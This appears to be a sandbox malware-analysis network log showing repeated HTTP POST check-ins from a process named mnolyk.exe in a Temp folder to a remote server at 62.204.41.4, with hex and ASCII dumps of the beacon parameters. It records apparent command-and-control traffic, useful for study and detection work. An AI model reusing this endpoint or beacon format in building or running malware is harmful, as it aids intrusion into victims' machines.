                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 106
                                                                    Source IP: 192.168.2.3
                                                                    Source Port: 49808
                                                                    Destination IP: 62.204.41.4
                                                                    Destination Port: 80
                                                                    Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:31:45.869321108 CET
                                                                    kBytes transferred: 307
                                                                    Direction: OUT
                                                                    Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:31:45.932929039 CET
                                                                    kBytes transferred: 307
                                                                    Direction: IN
                                                                    Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 107
                                                                    Source IP: 192.168.2.3
                                                                    Source Port: 49809
                                                                    Destination IP: 62.204.41.4
                                                                    Destination Port: 80
                                                                    Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:31:46.106372118 CET
                                                                    kBytes transferred: 308
                                                                    Direction: OUT
                                                                    Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:31:46.171797991 CET
                                                                    kBytes transferred: 308
                                                                    Direction: IN
                                                                    Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 108
                                                                    Source IP: 192.168.2.3
                                                                    Source Port: 49810
                                                                    Destination IP: 62.204.41.4
                                                                    Destination Port: 80
                                                                    Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:31:46.341948986 CET
                                                                    kBytes transferred: 309
                                                                    Direction: OUT
                                                                    Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:31:46.407923937 CET
                                                                    kBytes transferred: 309
                                                                    Direction: IN
                                                                    Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 109
                                                                    Source IP: 192.168.2.3
                                                                    Source Port: 49811
                                                                    Destination IP: 62.204.41.4
                                                                    Destination Port: 80
                                                                    Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:31:46.576529026 CET
                                                                    kBytes transferred: 310
                                                                    Direction: OUT
                                                                    Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:31:46.639722109 CET
                                                                    kBytes transferred: 310
                                                                    Direction: IN
                                                                    Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 11
                                                                    Source IP: 192.168.2.3
                                                                    Source Port: 49712
                                                                    Destination IP: 62.204.41.4
                                                                    Destination Port: 80
                                                                    Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:31:12.121654034 CET
                                                                    kBytes transferred: 211
                                                                    Direction: OUT
                                                                    Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:31:12.188114882 CET
                                                                    kBytes transferred: 212
                                                                    Direction: IN
                                                                    Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 110
                                                                    Source IP: 192.168.2.3
                                                                    Source Port: 49812
                                                                    Destination IP: 62.204.41.4
                                                                    Destination Port: 80
                                                                    Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:31:46.808504105 CET
                                                                    kBytes transferred: 311
                                                                    Direction: OUT
                                                                    Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:31:46.870836020 CET
                                                                    kBytes transferred: 311
                                                                    Direction: IN
                                                                    Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 111
                                                                    Source IP: 192.168.2.3
                                                                    Source Port: 49813
                                                                    Destination IP: 62.204.41.4
                                                                    Destination Port: 80
                                                                    Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:31:47.049280882 CET
                                                                    kBytes transferred: 312
                                                                    Direction: OUT
                                                                    Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:31:47.115288973 CET
                                                                    kBytes transferred: 312
                                                                    Direction: IN
                                                                    Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 112
                                                                    Source IP: 192.168.2.3
                                                                    Source Port: 49814
                                                                    Destination IP: 62.204.41.4
                                                                    Destination Port: 80
                                                                    Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:31:47.295499086 CET
                                                                    kBytes transferred: 313
                                                                    Direction: OUT
                                                                    Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:31:47.357366085 CET
                                                                    kBytes transferred: 313
                                                                    Direction: IN
                                                                    Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    113 | 192.168.2.3 | 49815 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:47.530708075 CET | 314 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:47.595089912 CET | 314 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    114 | 192.168.2.3 | 49816 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:47.785160065 CET | 315 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:47.847796917 CET | 315 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    115 | 192.168.2.3 | 49817 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:48.055582047 CET | 316 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:48.123281002 CET | 316 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    116 | 192.168.2.3 | 49818 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:48.341113091 CET | 317 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:48.404982090 CET | 317 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    117 | 192.168.2.3 | 49819 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:48.579157114 CET | 318 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:48.643449068 CET | 318 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    118 | 192.168.2.3 | 49820 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:48.811904907 CET | 319 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:48.877062082 CET | 319 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    119 | 192.168.2.3 | 49821 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:49.045770884 CET | 320 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:49.112457037 CET | 320 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    12 | 192.168.2.3 | 49713 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:12.783643007 CET | 212 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:12.846388102 CET | 213 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    120 | 192.168.2.3 | 49822 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:49.295197010 CET | 321 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:49.359004021 CET | 321 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    121 | 192.168.2.3 | 49823 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:49.543781996 CET | 322 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:49.606847048 CET | 322 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    122 | 192.168.2.3 | 49824 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
